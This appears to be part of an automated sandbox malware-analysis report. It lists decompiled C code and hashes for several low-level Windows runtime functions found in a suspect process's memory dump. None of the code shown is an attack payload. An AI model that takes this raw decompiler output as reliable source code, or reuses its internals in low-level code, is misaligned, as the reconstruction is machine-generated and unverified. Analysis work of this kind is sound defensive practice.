                                                    • Opcode ID: 977b9e3edffb50ee5eeb809e449a5377289b6024858215f7277eae55b9dc6e6b
                                                    • Instruction ID: 0034a0ae23f0bdf473239823ccdc59d8e3aa1c6d92d0800136eb0ca710fa5736
                                                    • Opcode Fuzzy Hash: 977b9e3edffb50ee5eeb809e449a5377289b6024858215f7277eae55b9dc6e6b
                                                    • Instruction Fuzzy Hash: 28219AB2A00649BBD715DB6CD884F2AB7B8FF48704F180069FA05C7790E634EE51CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F90AF Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E017F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0180D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E017EE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L017D4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E017FF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E017EA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                    0x017f90af
                                                    0x017f90b8
                                                    0x017f90bb
                                                    0x017f90bf
                                                    0x017f90c2
                                                    0x017f90c2
                                                    0x017f90c8
                                                    0x017f90cb
                                                    0x017f90cd
                                                    0x018314d7
                                                    0x018314eb
                                                    0x018314eb
                                                    0x00000000
                                                    0x018314eb
                                                    0x018314db
                                                    0x018314e6
                                                    0x00000000
                                                    0x018314f2
                                                    0x018314e8
                                                    0x00000000
                                                    0x018314e8
                                                    0x017f90d8
                                                    0x017f90da
                                                    0x017f90dd
                                                    0x017f90e5
                                                    0x00000000
                                                    0x017f9139
                                                    0x017f90fa
                                                    0x017f90fe
                                                    0x017f9142
                                                    0x00000000
                                                    0x017f9142
                                                    0x017f9104
                                                    0x017f9107
                                                    0x017f910b
                                                    0x017f9110
                                                    0x017f9118
                                                    0x017f9147
                                                    0x017f9148
                                                    0x017f914f
                                                    0x017f9150
                                                    0x017f9151
                                                    0x017f9152
                                                    0x017f9156
                                                    0x017f915d
                                                    0x017f9160
                                                    0x017f9168
                                                    0x017f916c
                                                    0x017f91bc
                                                    0x017f91be
                                                    0x00000000
                                                    0x017f91be
                                                    0x017f916e
                                                    0x017f9173
                                                    0x017f9176
                                                    0x00000000
                                                    0x00000000
                                                    0x017f917c
                                                    0x017f9180
                                                    0x017f91b5
                                                    0x00000000
                                                    0x017f91b5
                                                    0x017f9182
                                                    0x017f9185
                                                    0x017f9189
                                                    0x00000000
                                                    0x00000000
                                                    0x017f918e
                                                    0x017f9190
                                                    0x017f9198
                                                    0x00000000
                                                    0x00000000
                                                    0x017f91a0
                                                    0x00000000
                                                    0x017f91ad
                                                    0x017f91ad
                                                    0x017f91b0
                                                    0x017f91b1
                                                    0x00000000
                                                    0x017f9185
                                                    0x017f911a
                                                    0x017f911c
                                                    0x017f911f
                                                    0x017f9125
                                                    0x017f9127
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction ID: 9a06a8b244d040e0c0f063b969356326936a5aee62b99deff50c4935f3ceaee0
                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction Fuzzy Hash: 52217F71A00205EFDB21DF59C888FAAFBF8EB54714F1488BEFA45E7311D230A9448B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E3B7A Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E017E3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x18a84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x18a84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18a84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E017FAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E017FFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18a84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x18a84c4; // 0x0
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                    0x017e3b89
                                                    0x017e3b96
                                                    0x017e3ba1
                                                    0x017e3bab
                                                    0x017e3bb5
                                                    0x017e3bb9
                                                    0x01826298
                                                    0x017e3bbf
                                                    0x017e3bc2
                                                    0x017e3bc3
                                                    0x017e3bc9
                                                    0x017e3bca
                                                    0x017e3bcc
                                                    0x017e3bcd
                                                    0x017e3bd4
                                                    0x017e3bd6
                                                    0x017e3bdb
                                                    0x017e3bea
                                                    0x017e3bf7
                                                    0x017e3bfb
                                                    0x017e3bff
                                                    0x017e3c09
                                                    0x017e3c0a
                                                    0x017e3c0b
                                                    0x017e3c0f
                                                    0x017e3c14
                                                    0x017e3c18
                                                    0x017e3c18
                                                    0x017e3bfb
                                                    0x017e3c1b
                                                    0x017e3c30
                                                    0x017e3c30
                                                    0x017e3c3d

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6dcd2e09143c9442a3692c3509f8d41244ae117fda9d0863c4a14633403fc2bf
                                                    • Instruction ID: 396b2a2e2b6d8584603c51bbae70c5d8494aabe474d6996ccf217999ec646946
                                                    • Opcode Fuzzy Hash: 6dcd2e09143c9442a3692c3509f8d41244ae117fda9d0863c4a14633403fc2bf
                                                    • Instruction Fuzzy Hash: 3621BEB2A00109AFD710DF58CD85B5ABBBDFB44308F2500A8EA09AB251D371EE158BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01836CF0 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E01836CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E017D7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E017D7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1795c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E017EF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E017EF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01837016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L017D2400( &_v52);
								}
								_t21 = L017D2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                    0x01836cfb
                                                    0x01836d00
                                                    0x01836d02
                                                    0x01836d06
                                                    0x01836d0a
                                                    0x01836d0e
                                                    0x01836d19
                                                    0x01836d2b
                                                    0x01836d1b
                                                    0x01836d24
                                                    0x01836d24
                                                    0x01836d33
                                                    0x01836d39
                                                    0x01836d46
                                                    0x01836d4f
                                                    0x01836d61
                                                    0x01836d51
                                                    0x01836d5a
                                                    0x01836d5a
                                                    0x01836d69
                                                    0x01836d6b
                                                    0x01836d6d
                                                    0x01836d6f
                                                    0x01836d6f
                                                    0x01836d74
                                                    0x01836d79
                                                    0x01836d7a
                                                    0x01836d7f
                                                    0x01836d82
                                                    0x01836d88
                                                    0x01836d89
                                                    0x01836d90
                                                    0x01836d94
                                                    0x01836da7
                                                    0x01836db1
                                                    0x01836db1
                                                    0x01836dbb
                                                    0x01836dbb
                                                    0x01836d90
                                                    0x01836d69
                                                    0x01836d46
                                                    0x01836dc6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08d73c07614b57b3f86c5de04737d442672e46d6a820c28b55a6ab9e25645888
                                                    • Instruction ID: ab0db68a4260b5c781cc25de1b3876f3842aa18fc27ec23cbbb244493260baf4
                                                    • Opcode Fuzzy Hash: 08d73c07614b57b3f86c5de04737d442672e46d6a820c28b55a6ab9e25645888
                                                    • Instruction Fuzzy Hash: BE21F172400249ABD711DF2CC948B6BBBECAFD1340F080456FA40C7251E735CB48C6E2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0188070D Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E0188070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E018807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0187AFDE( &_v8,  &_v12);
					E01881293(_t38, _v28, _t60);
					if(E017D7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E018714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                    0x0188071b
                                                    0x01880724
                                                    0x01880734
                                                    0x01880738
                                                    0x0188074b
                                                    0x0188074b
                                                    0x01880753
                                                    0x01880753
                                                    0x01880759
                                                    0x0188075d
                                                    0x01880774
                                                    0x01880779
                                                    0x0188077d
                                                    0x01880789
                                                    0x01880795
                                                    0x018807a7
                                                    0x01880797
                                                    0x018807a0
                                                    0x018807a0
                                                    0x018807af
                                                    0x018807c4
                                                    0x018807cd
                                                    0x018807cd
                                                    0x018807af
                                                    0x018807dc

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction ID: f9115ef5bf40125b99943867141f9ffe56de974d2f1a250915966902410c2506
                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction Fuzzy Hash: C721F2362082049FD715FF2CC884B6ABBA5EBD4350F048569F995CB386DB30DA09CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01837794 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E01837794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x18a7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E017FF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E017D7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E017F9AE0();
					_t24 = L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                    0x01837799
                                                    0x0183779a
                                                    0x0183779b
                                                    0x018377a3
                                                    0x018377ab
                                                    0x018377ae
                                                    0x018377b1
                                                    0x018377b1
                                                    0x018377bf
                                                    0x018377c4
                                                    0x018377c8
                                                    0x018377ce
                                                    0x018377d4
                                                    0x018377e0
                                                    0x018377e0
                                                    0x018377d6
                                                    0x018377d6
                                                    0x018377de
                                                    0x00000000
                                                    0x00000000
                                                    0x018377de
                                                    0x018377e5
                                                    0x018377f0
                                                    0x018377f3
                                                    0x018377f6
                                                    0x018377fd
                                                    0x01837800
                                                    0x0183780c
                                                    0x01837818
                                                    0x0183782b
                                                    0x0183781a
                                                    0x01837823
                                                    0x01837823
                                                    0x01837830
                                                    0x01837831
                                                    0x01837838
                                                    0x0183783d
                                                    0x0183783e
                                                    0x0183784f
                                                    0x0183784f
                                                    0x0183785a

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c10b425f39bb1ac0cd767d119ff6ad44b4fb41ea1709ce2f158fd99354eabd8d
                                                    • Instruction ID: 279ce1d0d8f65b9e204e89d5ce1dc2a86f6c7a8d2a775af59b9951c89e5b0034
                                                    • Opcode Fuzzy Hash: c10b425f39bb1ac0cd767d119ff6ad44b4fb41ea1709ce2f158fd99354eabd8d
                                                    • Instruction Fuzzy Hash: 3221C0B2900608AFC725DF69DC84E6BBBB8EF88340F14056DF60AC7750D634EA00CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DAE73 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E017DAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E017D7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E017D7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E017D7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E017D7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01837794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                    0x017dae78
                                                    0x017dae7c
                                                    0x017dae7e
                                                    0x017dae81
                                                    0x017dae86
                                                    0x017dae8d
                                                    0x01822691
                                                    0x017dae93
                                                    0x017dae93
                                                    0x017dae93
                                                    0x017dae98
                                                    0x017dae9d
                                                    0x018226a2
                                                    0x018226b4
                                                    0x018226a4
                                                    0x018226ad
                                                    0x018226ad
                                                    0x018226b9
                                                    0x00000000
                                                    0x018226bb
                                                    0x00000000
                                                    0x018226bb
                                                    0x017daea3
                                                    0x017daea3
                                                    0x017daea3
                                                    0x017daeaa
                                                    0x018226c0
                                                    0x018226c9
                                                    0x018226c9
                                                    0x017daeb3
                                                    0x018226d4
                                                    0x018226e1
                                                    0x00000000
                                                    0x00000000
                                                    0x018226e7
                                                    0x018226ee
                                                    0x018226f0
                                                    0x018226f9
                                                    0x018226f9
                                                    0x01822702
                                                    0x01822708
                                                    0x01822708
                                                    0x0182270b
                                                    0x0182270f
                                                    0x01822711
                                                    0x01822711
                                                    0x01822725
                                                    0x01822725
                                                    0x00000000
                                                    0x017daeb9
                                                    0x017daeb9
                                                    0x017daebf
                                                    0x017daebf
                                                    0x017daeb3

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction ID: a5add4e662dc4cf0a53853f62f389fcbf0b4da5e98484a05935bd57916854e82
                                                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction Fuzzy Hash: 9E21D1726056999FE7279B2CC948B25BBEAFF45354F0900E0DD04CB6A2E738DD80C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EFD9B Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E017EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E017C76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                    0x017efd9b
                                                    0x017efda0
                                                    0x017efda1
                                                    0x017efdab
                                                    0x017efdad
                                                    0x017efdb0
                                                    0x017efdb8
                                                    0x017efe0f
                                                    0x017efde6
                                                    0x017efde9
                                                    0x017efdec
                                                    0x0182c0c0
                                                    0x017efdfe
                                                    0x017efe06
                                                    0x017efe06
                                                    0x0182c0c8
                                                    0x017efe2d
                                                    0x017efe2d
                                                    0x00000000
                                                    0x017efe2d
                                                    0x0182c0d1
                                                    0x0182c0e0
                                                    0x0182c0e5
                                                    0x0182c0e5
                                                    0x0182c0e8
                                                    0x00000000
                                                    0x0182c0e8
                                                    0x017efdf4
                                                    0x00000000
                                                    0x00000000
                                                    0x017efdf6
                                                    0x017efdfa
                                                    0x017efe1a
                                                    0x017efe1f
                                                    0x017efe1f
                                                    0x017efdfc
                                                    0x00000000
                                                    0x017efdfc
                                                    0x017efdcc
                                                    0x017efdd0
                                                    0x017efe26
                                                    0x00000000
                                                    0x017efe26
                                                    0x017efdd8
                                                    0x017efddb
                                                    0x017efddd
                                                    0x017efde0
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction ID: 39bea977044a8eedbb5e7eba38668f6da04ab88607aff158907145bf5634f256
                                                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                    • Instruction Fuzzy Hash: 7521A972A00A40DBD735CF0DC548A66FBE9EB98B10F2080AEE94987B15D731AC40CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EB390 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E017EB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E017D2280(_t12, 0x18a8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E017F00C2(0x18a8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                    0x017eb395
                                                    0x017eb3a2
                                                    0x017eb3a5
                                                    0x017eb3aa
                                                    0x017eb3b2
                                                    0x017eb3ba
                                                    0x017eb3bd
                                                    0x017eb3c0
                                                    0x017eb3c4
                                                    0x017eb3c9
                                                    0x0182a3e9
                                                    0x0182a3ed
                                                    0x0182a3f0
                                                    0x0182a3ff
                                                    0x0182a403
                                                    0x0182a409
                                                    0x00000000
                                                    0x00000000
                                                    0x0182a40b
                                                    0x0182a40b
                                                    0x0182a40f
                                                    0x0182a415
                                                    0x0182a423
                                                    0x0182a423
                                                    0x0182a415
                                                    0x017eb3d1
                                                    0x017eb3e8
                                                    0x017eb3e8
                                                    0x017eb3d9

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42cbd46b5a66305d89aecfecb34a948843fde292f2e1af20bcfa2518fb9bcfe0
                                                    • Instruction ID: 054ba4548b6b76f416a25305b61fa8c347e7517c857fbd133314b6fe8b8df376
                                                    • Opcode Fuzzy Hash: 42cbd46b5a66305d89aecfecb34a948843fde292f2e1af20bcfa2518fb9bcfe0
                                                    • Instruction Fuzzy Hash: CB116F377051105BDB1D8A188D8562BF6E7EFC9330B69412DDE16C7780C9359D02C690
                                                    Uniqueness

